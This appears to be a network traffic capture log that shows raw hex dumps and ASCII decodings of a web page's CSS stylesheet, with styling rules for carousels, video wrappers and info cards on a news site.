                                                                                                                                                                        2023-06-02 11:13:21 UTC122INData Raw: 2d 61 75 74 68 6f 72 73 20 2e 65 78 70 61 6e 64 2d 62 75 74 74 6f 6e 2e 63 6f 6c 6c 61 70 73 65 64 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 2e 2e 2e 22 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 39 35 39 70 78 29 7b 2e 63 61 61 73 2d 61 74 74 72 2d 6d 65 74 61 2d 74 69 74 6c 65 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 7d 2e 63 61 61 73 2d 70 68 6f 74 6f 73 65 74 20 66 69 67 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 31 64 32 32 32 38 7d 2e 63 61 61 73 2d 70 68 6f 74 6f 73 65 74 20 66 69 67 75 72 65 7b 6d 61 72 67 69 6e 3a 30 20 30 20 32 65 6d 7d 2e 63 61 61 73 2d 70 68 6f 74 6f 73 65 74 20 2e 63 61 70 74 69 6f 6e 2d 63 6f 6c 6c 61 70 73 65 20 68 32 7b 6d 61 72 67 69 6e 3a 30 20 30
                                                                                                                                                                        Data Ascii: -authors .expand-button.collapsed:before{content:"..."}@media only screen and (max-width:959px){.caas-attr-meta-title{display:none}}.caas-photoset figcaption{color:#1d2228}.caas-photoset figure{margin:0 0 2em}.caas-photoset .caption-collapse h2{margin:0 0
                                                                                                                                                                        2023-06-02 11:13:21 UTC123INData Raw: 69 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 63 6f 76 65 72 3b 62 6f 74 74 6f 6d 3a 30 3b 6c 65 66 74 3a 30 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 72 69 67 68 74 3a 30 3b 74 6f 70 3a 30 7d 2e 63 61 61 73 2d 79 76 69 64 65 6f 2d 77 72 61 70 70 65 72 20 2e 63 61 61 73 2d 79 76 69 64 65 6f 7b 62 6f 74 74 6f 6d 3a 30 3b 68 65 69 67 68 74 3a 31 30 30 25 3b 6c 65 66 74 3a 30 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 6d 61 78 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 30 25 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 72 69 67 68 74 3a 30 3b 74 6f 70 3a 30 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 63 61 61 73 2d 79 76 69 64 65 6f 2d 77 72 61 70 70
                                                                                                                                                                        Data Ascii: il{background-size:cover;bottom:0;left:0;position:absolute;right:0;top:0}.caas-yvideo-wrapper .caas-yvideo{bottom:0;height:100%;left:0;margin:auto;max-height:100%;max-width:100%;overflow:hidden;position:absolute;right:0;top:0;width:100%}.caas-yvideo-wrapp
                                                                                                                                                                        2023-06-02 11:13:21 UTC124INData Raw: 77 73 65 72 2d 6d 6f 62 69 6c 65 20 2e 76 70 2d 62 6f 74 74 6f 6d 2d 62 61 72 20 2e 76 70 2d 70 6c 61 79 2d 63 6f 6e 74 72 6f 6c 73 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 2e 63 61 61 73 2d 79 76 69 64 65 6f 2d 77 72 61 70 70 65 72 20 2e 63 61 61 73 2d 79 76 69 64 65 6f 3a 6e 6f 74 28 2e 63 61 61 73 2d 79 76 69 64 65 6f 2d 66 75 6c 6c 2d 64 6f 63 6b 29 20 2e 76 70 2d 64 6f 63 6b 65 64 2d 6d 6f 64 65 20 2e 76 70 2d 62 6f 74 74 6f 6d 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 76 70 2d 6d 65 6e 75 2d 63 6f 6e 74 72 6f 6c 73 20 2e 76 70 2d 61 69 72 70 6c 61 79 2d 62 74 6e 2c 2e 63 61 61 73 2d 79 76 69 64 65 6f 2d 77 72 61 70 70 65 72 20 2e 63 61 61 73 2d 79 76 69 64 65 6f 3a 6e 6f 74 28 2e 63 61 61 73 2d 79 76 69 64 65 6f 2d 66 75 6c 6c 2d 64 6f 63 6b 29 20 2e 76
                                                                                                                                                                        Data Ascii: wser-mobile .vp-bottom-bar .vp-play-controls{display:none}.caas-yvideo-wrapper .caas-yvideo:not(.caas-yvideo-full-dock) .vp-docked-mode .vp-bottom-container .vp-menu-controls .vp-airplay-btn,.caas-yvideo-wrapper .caas-yvideo:not(.caas-yvideo-full-dock) .v
                                                                                                                                                                        2023-06-02 11:13:21 UTC126INData Raw: 65 72 20 2e 63 61 61 73 2d 79 76 69 64 65 6f 3a 6e 6f 74 28 2e 63 61 61 73 2d 79 76 69 64 65 6f 2d 66 75 6c 6c 2d 64 6f 63 6b 29 20 2e 79 76 70 2d 64 6f 63 6b 65 64 2d 6d 6f 64 65 20 2e 79 76 70 2d 70 6c 61 79 69 6e 67 2d 69 74 65 6d 2d 74 69 74 6c 65 2c 2e 63 61 61 73 2d 79 76 69 64 65 6f 2d 77 72 61 70 70 65 72 20 2e 63 61 61 73 2d 79 76 69 64 65 6f 3a 6e 6f 74 28 2e 63 61 61 73 2d 79 76 69 64 65 6f 2d 66 75 6c 6c 2d 64 6f 63 6b 29 20 2e 79 76 70 2d 64 6f 63 6b 65 64 2d 6d 6f 64 65 20 2e 79 76 70 2d 73 6c 69 64 65 72 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 2e 63 61 61 73 2d 69 66 72 61 6d 65 7b 2d 77 65 62 6b 69 74 2d 6f 76 65 72 66 6c 6f 77 2d 73 63 72 6f 6c 6c 69 6e 67 3a 74 6f 75 63 68 3b 6d 61 72 67 69 6e 3a 31 35 70 78 20 30 20 31 30 70 78 3b 6f
                                                                                                                                                                        Data Ascii: er .caas-yvideo:not(.caas-yvideo-full-dock) .yvp-docked-mode .yvp-playing-item-title,.caas-yvideo-wrapper .caas-yvideo:not(.caas-yvideo-full-dock) .yvp-docked-mode .yvp-slider{display:none}.caas-iframe{-webkit-overflow-scrolling:touch;margin:15px 0 10px;o
                                                                                                                                                                        2023-06-02 11:13:21 UTC127INData Raw: 61 72 67 69 6e 3a 30 20 30 20 31 30 70 78 3b 6d 61 78 2d 77 69 64 74 68 3a 36 36 30 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 32 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 30 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 63 61 61 73 2d 69 66 72 61 6d 65 2d 63 65 72 6f 73 2d 77 72 61 70 70 65 72 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 32 30 70 78 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 2d 32 30 70 78 3b 77 69 64 74 68 3a 61 75 74 6f 7d 2e 63 61 61 73 2d 72 6d 70 2d 77 72 61 70 70 65 72 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 35 70 78 7d 2e 63 61 61 73 2d 72 6d 70 2d 77 72 61 70 70 65 72 20 2e 63 61 61 73 2d 72 6d 70 7b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69
                                                                                                                                                                        Data Ascii: argin:0 0 10px;max-width:660px;min-width:280px;padding:0;width:100%}.caas-iframe-ceros-wrapper{margin-left:-20px;margin-right:-20px;width:auto}.caas-rmp-wrapper{margin-bottom:10px;margin-top:15px}.caas-rmp-wrapper .caas-rmp{overflow:hidden;position:relati
                                                                                                                                                                        2023-06-02 11:13:21 UTC128INData Raw: 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 37 66 38 66 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 39 30 64 65 67 2c 68 73 6c 61 28 30 2c 30 25 2c 31 30 30 25 2c 30 29 20 30 2c 68 73 6c 61 28 30 2c 30 25 2c 31 30 30 25 2c 2e 36 29 20 33 30 25 2c 68 73 6c 61 28 30 2c 30 25 2c 31 30 30 25 2c 30 29 20 38 31 25 29 3b 63 6f 6e 74 65 6e 74 3a 22 22 3b 68 65 69 67 68 74 3a 31 30 30 25 3b 6c 65 66 74 3a 30 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 74 6f 70 3a 30 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 63 61 61 73 2d 64 61 20 2e 63 61 61 73 2d 64 61 2d 6c 6f 61 64 65 72 20 69 3a 62 65 66 6f 72 65 2c 2e 63 61 61 73 2d 73 64 61 20 2e 63 61 61 73 2d 64 61 2d 6c 6f 61 64 65 72 20 69 3a 62 65 66 6f 72 65 7b 68 65 69 67
                                                                                                                                                                        Data Ascii: und-color:#f7f8ff;background:linear-gradient(90deg,hsla(0,0%,100%,0) 0,hsla(0,0%,100%,.6) 30%,hsla(0,0%,100%,0) 81%);content:"";height:100%;left:0;position:absolute;top:0;width:100%}.caas-da .caas-da-loader i:before,.caas-sda .caas-da-loader i:before{heig
                                                                                                                                                                        2023-06-02 11:13:21 UTC129INData Raw: 20 2e 63 61 61 73 2d 64 61 2d 70 6c 61 63 65 68 6f 6c 64 65 72 20 69 3a 62 65 66 6f 72 65 7b 68 65 69 67 68 74 3a 39 30 70 78 7d 40 6b 65 79 66 72 61 6d 65 73 20 61 64 68 69 64 65 7b 30 25 7b 76 69 73 69 62 69 6c 69 74 79 3a 76 69 73 69 62 6c 65 7d 74 6f 7b 76 69 73 69 62 69 6c 69 74 79 3a 68 69 64 64 65 6e 7d 7d 2e 63 61 61 73 20 62 6c 6f 63 6b 71 75 6f 74 65 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 2e 63 61 61 73 20 2e 63 61 61 73 2d 70 75 6c 6c 2d 71 75 6f 74 65 2d 77 72 61 70 70 65 72 2e 69 73 2d 69 6d 61 67 65 2d 71 75 6f 74 65 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 35 30 25 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 63 6f 76 65 72 7d 2e 63 61 61 73 20 2e 63 61 61 73 2d 70 75 6c 6c 2d 71 75 6f 74 65
                                                                                                                                                                        Data Ascii: .caas-da-placeholder i:before{height:90px}@keyframes adhide{0%{visibility:visible}to{visibility:hidden}}.caas blockquote{margin:0;padding:0}.caas .caas-pull-quote-wrapper.is-image-quote{background-position:50%;background-size:cover}.caas .caas-pull-quote
                                                                                                                                                                        2023-06-02 11:13:21 UTC131INData Raw: 3d 73 6d 61 72 74 70 68 6f 6e 65 5d 20 2e 63 61 61 73 2d 70 75 6c 6c 2d 71 75 6f 74 65 2d 77 72 61 70 70 65 72 2e 69 73 2d 69 6d 61 67 65 2d 71 75 6f 74 65 20 2e 63 61 61 73 2d 70 75 6c 6c 2d 71 75 6f 74 65 7b 6d 69 6e 2d 68 65 69 67 68 74 3a 33 35 37 70 78 3b 70 61 64 64 69 6e 67 3a 30 20 32 33 70 78 20 32 33 70 78 7d 2e 63 61 61 73 5b 64 61 74 61 2d 64 65 76 69 63 65 3d 73 6d 61 72 74 70 68 6f 6e 65 5d 20 2e 63 61 61 73 2d 62 6c 6f 63 6b 71 75 6f 74 65 2e 63 61 61 73 2d 70 75 6c 6c 2d 71 75 6f 74 65 20 2e 69 63 6f 6e 2e 71 75 6f 74 65 6d 61 72 6b 7b 68 65 69 67 68 74 3a 31 34 70 78 3b 77 69 64 74 68 3a 32 30 70 78 7d 2e 63 61 61 73 5b 64 61 74 61 2d 64 65 76 69 63 65 3d 73 6d 61 72 74 70 68 6f 6e 65 5d 20 2e 63 61 61 73 2d 62 6c 6f 63 6b 71 75 6f 74 65
                                                                                                                                                                        Data Ascii: =smartphone] .caas-pull-quote-wrapper.is-image-quote .caas-pull-quote{min-height:357px;padding:0 23px 23px}.caas[data-device=smartphone] .caas-blockquote.caas-pull-quote .icon.quotemark{height:14px;width:20px}.caas[data-device=smartphone] .caas-blockquote
                                                                                                                                                                        2023-06-02 11:13:21 UTC132INData Raw: 74 79 70 65 5d 3a 6e 6f 74 28 5b 74 79 70 65 3d 22 22 5d 29 20 6c 69 7b 6c 69 73 74 2d 73 74 79 6c 65 2d 74 79 70 65 3a 69 6e 68 65 72 69 74 7d 2e 63 61 61 73 2d 6c 69 73 74 20 6c 69 20 6c 69 2c 2e 63 61 61 73 2d 6c 69 73 74 20 6c 69 20 70 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 65 6d 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 74 6f 70 7d 2e 63 61 61 73 2d 6c 69 73 74 2e 63 61 61 73 2d 6c 69 73 74 2d 62 75 6c 6c 65 74 20 6c 69 7b 6c 69 73 74 2d 73 74 79 6c 65 2d 74 79 70 65 3a 64 69 73 63 7d 2e 63 61 61 73 2d 6d 65 64 69 61 2d 77 72 61 70 70 65 72 7b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 63 37 63 64 64 32 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 34 70 78 7d 2e 69 6e 73 74 61 67 72 61 6d 2d 6d 65 64 69 61 2d 77 72 61 70 70 65 72 7b 70
                                                                                                                                                                        Data Ascii: type]:not([type=""]) li{list-style-type:inherit}.caas-list li li,.caas-list li p{font-size:1em;vertical-align:top}.caas-list.caas-list-bullet li{list-style-type:disc}.caas-media-wrapper{border:1px solid #c7cdd2;border-radius:4px}.instagram-media-wrapper{p
                                                                                                                                                                        2023-06-02 11:13:21 UTC133INData Raw: 69 70 74 69 6f 6e 2e 63 6f 6c 6c 61 70 73 65 2d 63 61 70 74 69 6f 6e 20 2e 64 65 73 63 72 69 70 74 69 6f 6e 2d 63 72 65 64 69 74 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 7d 2e 63 61 61 73 2d 63 61 72 6f 75 73 65 6c 20 2e 64 65 73 63 72 69 70 74 69 6f 6e 2e 63 6f 6c 6c 61 70 73 65 2d 63 61 70 74 69 6f 6e 20 2e 65 78 70 61 6e 64 2d 62 75 74 74 6f 6e 7b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 69 6e 68 65 72 69 74 3b 70 61 64 64 69 6e 67 3a 30 20 30 20 30 20 35 70 78 7d 2e 63 61 61 73 2d 63 61 72 6f 75 73 65 6c 20 2e 64 65 73 63 72 69 70 74 69 6f 6e 2e 63 6f 6c 6c 61 70 73 65 2d 63 61 70 74 69 6f 6e 2e 63 6f 6c 6c 61 70 73 65 64 7b 2d 77 65 62 6b 69 74 2d 6c 69 6e 65 2d 63 6c 61 6d 70 3a 33 3b 2d
                                                                                                                                                                        Data Ascii: iption.collapse-caption .description-credit{display:inline-block}.caas-carousel .description.collapse-caption .expand-button{cursor:pointer;line-height:inherit;padding:0 0 0 5px}.caas-carousel .description.collapse-caption.collapsed{-webkit-line-clamp:3;-
                                                                                                                                                                        2023-06-02 11:13:21 UTC133INData Raw: 69 65 6e 74 3a 76 65 72 74 69 63 61 6c 3b 64 69 0d 0a 31 38 30 30 30 0d 0a 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 62 6f 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 63 61 61 73 2d 63 61 72 6f 75 73 65 6c 20 2e 64 65 73 63 72 69 70 74 69 6f 6e 2e 63 6f 6c 6c 61 70 73 65 2d 63 61 70 74 69 6f 6e 2e 63 6f 6c 6c 61 70 73 65 64 20 2e 65 78 70 61 6e 64 2d 62 75 74 74 6f 6e 2e 63 6f 6c 6c 61 70 73 65 64 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 62 6f 74 74 6f 6d 3a 30 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 30 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 72 69 67 68 74 3a 30 7d 2e 63 61 61 73 2d 63 61 72 6f 75 73 65 6c 20 2e 64 65 73 63 72 69 70 74 69 6f
                                                                                                                                                                        Data Ascii: ient:vertical;di18000splay:-webkit-box;overflow:hidden;position:relative}.caas-carousel .description.collapse-caption.collapsed .expand-button.collapsed{background-color:#fff;bottom:0;padding-left:0;position:absolute;right:0}.caas-carousel .descriptio
                                                                                                                                                                        2023-06-02 11:13:21 UTC135INData Raw: 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 74 6f 70 3a 35 30 25 3b 2d 77 65 62 6b 69 74 2d 75 73 65 72 2d 73 65 6c 65 63 74 3a 6e 6f 6e 65 3b 2d 6d 6f 7a 2d 75 73 65 72 2d 73 65 6c 65 63 74 3a 6e 6f 6e 65 3b 75 73 65 72 2d 73 65 6c 65 63 74 3a 6e 6f 6e 65 3b 7a 2d 69 6e 64 65 78 3a 32 7d 2e 63 61 61 73 2d 63 61 72 6f 75 73 65 6c 20 2e 6e 65 78 74 2d 62 75 74 74 6f 6e 3a 68 6f 76 65 72 2c 2e 63 61 61 73 2d 63 61 72 6f 75 73 65 6c 20 2e 70 72 65 76 2d 62 75 74 74 6f 6e 3a 68 6f 76 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 34 34 34 3b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 7d 40 6d 65 64 69 61 20 28 68 6f 76 65 72 3a 6e 6f 6e 65 29 7b 2e 63 61 61 73 2d 63 61 72 6f 75 73 65 6c 20 2e 6e 65 78 74 2d 62 75 74 74 6f 6e 3a 68 6f 76 65 72 2c 2e 63 61 61 73 2d 63
                                                                                                                                                                        Data Ascii: ion:absolute;top:50%;-webkit-user-select:none;-moz-user-select:none;user-select:none;z-index:2}.caas-carousel .next-button:hover,.caas-carousel .prev-button:hover{background:#444;cursor:pointer}@media (hover:none){.caas-carousel .next-button:hover,.caas-c
                                                                                                                                                                        2023-06-02 11:13:21 UTC136INData Raw: 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 63 61 61 73 2d 63 61 72 6f 75 73 65 6c 2e 73 6c 69 64 65 73 68 6f 77 76 32 20 2e 66 69 67 75 72 65 2d 6d 65 74 61 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 30 37 37 65 6d 3b 68 65 69 67 68 74 3a 31 30 30 25 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 35 3b 6d 61 72 67 69 6e 3a 30 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 74 6f 70 3a 31 30 70 78 7d 2e 63 61 61 73 2d 63 61 72 6f 75 73 65 6c 2e 73 6c 69 64 65 73 68 6f 77 76 32 20 2e 73 6c 69 64 65 2d 63 75 72 72 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 2e 63 61 61 73 2d 63 61 72 6f 75
                                                                                                                                                                        Data Ascii: ition:absolute;width:100%}.caas-carousel.slideshowv2 .figure-meta{box-sizing:border-box;display:flex;font-size:1.077em;height:100%;line-height:1.5;margin:0;position:relative;top:10px}.caas-carousel.slideshowv2 .slide-current{margin:0;padding:0}.caas-carou
                                                                                                                                                                        2023-06-02 11:13:21 UTC137INData Raw: 69 6e 68 65 72 69 74 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 69 6e 68 65 72 69 74 3b 6d 61 72 67 69 6e 3a 30 7d 2e 63 61 61 73 2d 63 61 72 6f 75 73 65 6c 2e 73 6c 69 64 65 73 68 6f 77 76 32 20 2e 63 61 61 73 2d 61 64 2d 73 6c 69 64 65 20 2e 73 6c 69 64 65 2d 64 65 73 63 72 69 70 74 69 6f 6e 2d 77 72 61 70 70 65 72 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 30 7d 2e 63 61 61 73 2d 63 61 72 6f 75 73 65 6c 2e 73 6c 69 64 65 73 68 6f 77 76 32 20 2e 63 61 61 73 2d 61 64 2d 73 75 6d 6d 61 72 79 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 2e 63 61 61 73 2d 63 61 72 6f 75 73 65 6c 2e 73 6c 69 64 65 73 68 6f 77 76 32 20 2e 6e 65 78 74 2d 62 75 74 74 6f 6e 2c 2e 63 61 61 73 2d 63 61 72 6f 75 73 65 6c 2e 73 6c 69 64 65 73
                                                                                                                                                                        Data Ascii: inherit;font-weight:400;line-height:inherit;margin:0}.caas-carousel.slideshowv2 .caas-ad-slide .slide-description-wrapper{padding-left:0}.caas-carousel.slideshowv2 .caas-ad-summary{display:none}.caas-carousel.slideshowv2 .next-button,.caas-carousel.slides
                                                                                                                                                                        2023-06-02 11:13:21 UTC138INData Raw: 78 20 73 6f 6c 69 64 20 23 66 66 66 3b 6f 70 61 63 69 74 79 3a 31 7d 2e 63 61 61 73 2d 63 61 72 6f 75 73 65 6c 2e 73 6c 69 64 65 73 68 6f 77 76 32 20 2e 74 68 75 6d 62 6e 61 69 6c 2d 61 6e 63 68 6f 72 3a 68 6f 76 65 72 7b 6f 70 61 63 69 74 79 3a 31 7d 2e 63 61 61 73 2d 63 61 72 6f 75 73 65 6c 2e 73 6c 69 64 65 73 68 6f 77 76 32 20 2e 74 68 75 6d 62 6e 61 69 6c 2d 66 69 67 75 72 65 7b 68 65 69 67 68 74 3a 31 30 30 25 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 63 61 61 73 2d 63 61 72 6f 75 73 65 6c 2e 73 6c 69 64 65 73 68 6f 77 76 32 20 2e 74 68 75 6d 62 6e 61 69 6c 2d 66 69 67 75 72 65 20 2e 74 68 75 6d 62 6e 61 69 6c 2d 69 6d 61 67 65 7b 68 65 69 67 68 74 3a 31 30 30 25 3b 2d 6f 2d 6f 62 6a 65 63 74 2d 66 69 74 3a 63 6f 76 65 72 3b 6f 62 6a 65 63 74 2d 66 69
                                                                                                                                                                        Data Ascii: x solid #fff;opacity:1}.caas-carousel.slideshowv2 .thumbnail-anchor:hover{opacity:1}.caas-carousel.slideshowv2 .thumbnail-figure{height:100%;width:100%}.caas-carousel.slideshowv2 .thumbnail-figure .thumbnail-image{height:100%;-o-object-fit:cover;object-fi
                                                                                                                                                                        2023-06-02 11:13:21 UTC140INData Raw: 6e 74 65 72 3b 70 61 64 64 69 6e 67 3a 30 20 38 70 78 7d 2e 63 61 61 73 2d 78 72 61 79 2d 70 69 6c 6c 2e 63 61 61 73 2d 78 72 61 79 2d 70 69 6c 6c 2d 77 69 74 68 2d 69 6d 61 67 65 20 2e 78 72 61 79 2d 70 69 6c 6c 2d 63 6f 6e 74 65 6e 74 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 34 70 78 7d 2e 63 61 61 73 2d 78 72 61 79 2d 70 69 6c 6c 20 2e 78 72 61 79 2d 70 69 6c 6c 2d 69 6d 61 67 65 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 30 65 34 65 39 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 35 30 25 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 6e 6f 2d 72 65 70 65 61 74 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 63 6f 76 65 72 3b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64
                                                                                                                                                                        Data Ascii: nter;padding:0 8px}.caas-xray-pill.caas-xray-pill-with-image .xray-pill-content{padding-left:4px}.caas-xray-pill .xray-pill-image-container{background-color:#e0e4e9;background-position:50%;background-repeat:no-repeat;background-size:cover;border:1px solid
                                                                                                                                                                        2023-06-02 11:13:21 UTC141INData Raw: 61 73 2d 78 72 61 79 2d 70 69 6c 6c 2e 63 61 61 73 2d 78 72 61 79 2d 70 69 6c 6c 2d 74 79 70 65 2d 74 69 63 6b 65 72 5f 77 61 74 63 68 6c 69 73 74 20 2e 78 72 61 79 2d 70 69 6c 6c 2d 6c 61 62 65 6c 7b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 38 70 78 7d 2e 63 61 61 73 2d 78 72 61 79 2d 70 69 6c 6c 2e 63 61 61 73 2d 78 72 61 79 2d 70 69 6c 6c 2d 74 79 70 65 2d 74 69 63 6b 65 72 20 2e 78 72 61 79 2d 66 69 6e 2d 73 74 72 65 61 6d 65 72 2c 2e 63 61 61 73 2d 78 72 61 79 2d 70 69 6c 6c 2e 63 61 61 73 2d 78 72 61 79 2d 70 69 6c 6c 2d 74 79 70 65 2d 74 69 63 6b 65 72 5f 77 61 74 63 68 6c 69 73 74 20 2e 78 72 61 79 2d 66 69 6e 2d 73 74 72 65 61 6d 65 72 7b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 63 6f 6c 6f 72 3a 67 72 65 79 3b 64 69 73 70 6c 61
                                                                                                                                                                        Data Ascii: as-xray-pill.caas-xray-pill-type-ticker_watchlist .xray-pill-label{padding-right:8px}.caas-xray-pill.caas-xray-pill-type-ticker .xray-fin-streamer,.caas-xray-pill.caas-xray-pill-type-ticker_watchlist .xray-fin-streamer{align-items:center;color:grey;displa
                                                                                                                                                                        2023-06-02 11:13:21 UTC142INData Raw: 69 76 65 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 30 66 33 66 35 7d 2e 63 61 61 73 2d 78 72 61 79 2d 63 61 72 64 20 2e 78 72 61 79 2d 63 61 72 64 2d 69 6d 61 67 65 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 30 65 34 65 39 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 35 30 25 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 6e 6f 2d 72 65 70 65 61 74 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 63 6f 76 65 72 3b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 65 30 65 34 65 39 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 35 30 25 3b 68 65 69 67 68 74 3a 33 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61
                                                                                                                                                                        Data Ascii: ive{background-color:#f0f3f5}.caas-xray-card .xray-card-image-container{background-color:#e0e4e9;background-position:50%;background-repeat:no-repeat;background-size:cover;border:1px solid #e0e4e9;border-radius:50%;height:32px;overflow:hidden;position:rela
                                                                                                                                                                        2023-06-02 11:13:21 UTC144INData Raw: 74 79 70 65 2d 77 69 6b 69 3a 6e 6f 74 28 2e 63 61 61 73 2d 78 72 61 79 2d 63 61 72 64 2d 73 69 6e 67 6c 65 2d 65 6e 74 69 74 79 29 20 2e 78 72 61 79 2d 63 61 72 64 2d 72 69 67 68 74 2d 63 6f 6c 75 6d 6e 20 2e 78 72 61 79 2d 63 61 72 64 2d 72 6f 77 2d 73 75 62 74 69 74 6c 65 7b 6d 61 78 2d 77 69 64 74 68 3a 31 32 30 70 78 7d 2e 63 61 61 73 2d 78 72 61 79 2d 63 61 72 64 2e 63 61 61 73 2d 78 72 61 79 2d 63 61 72 64 2d 74 79 70 65 2d 74 65 61 6d 20 2e 78 72 61 79 2d 63 61 72 64 2d 69 6d 61 67 65 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 7d 2e 63 61 61 73 2d 78 72 61 79 2d 63 61 72 64 20 2e 78 72 61 79 2d 63 61 72 64 2d 72 6f 77 2d 6d 6f 76 69 65 2d 73 75 62 74 69 74 6c 65 2c 2e 63 61
                                                                                                                                                                        Data Ascii: type-wiki:not(.caas-xray-card-single-entity) .xray-card-right-column .xray-card-row-subtitle{max-width:120px}.caas-xray-card.caas-xray-card-type-team .xray-card-image-container{background-color:transparent}.caas-xray-card .xray-card-row-movie-subtitle,.ca
